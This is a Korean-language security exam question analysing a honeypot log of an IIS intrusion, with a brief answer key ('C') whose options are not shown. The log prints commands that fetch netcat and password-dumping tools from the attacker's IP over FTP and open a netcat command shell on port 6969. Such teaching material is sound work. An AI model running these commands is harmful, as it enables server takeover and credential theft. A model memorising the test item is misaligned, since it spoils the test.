질문 341
다음 발췌 내용은 lab.wiretrip.net에서 호스팅된 허니팟 로그에서 발췌한 것입니다. Snort는 213.116.251.162에서 유니코드 공격을 보고했습니다. 파일 권한 정식화 취약점(유니코드 공격)은 일반적으로 스크립트를 실행할 권한이 없는 임의의 폴더에서 스크립트를 실행할 수 있게 합니다. 공격자는 유니코드 공격을 시도하고 결국 boot.ini를 표시하는 데 성공합니다.
그런 다음 msadcs.dll을 통해 RDS를 플레이하는 것으로 전환합니다. RDS 취약점을 통해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행하는 SQL 문을 구성할 수 있습니다. 공격자는 빠른 쿼리를 통해 디렉터리가 존재하는지 확인하고, msadcs.dll에 대한 쿼리를 통해 해당 디렉터리가 올바르게 작동하는 것을 확인합니다. 공격자가 RDS 쿼리를 수행하면 아래와 같이 명령이 실행됩니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 익스플로잇에서 무엇을 유추할 수 있나요?
로그에 따르면 이 익스플로잇은 3개의 파일이 다운로드되는 원격 익스플로잇이므로 정답은 C입니다.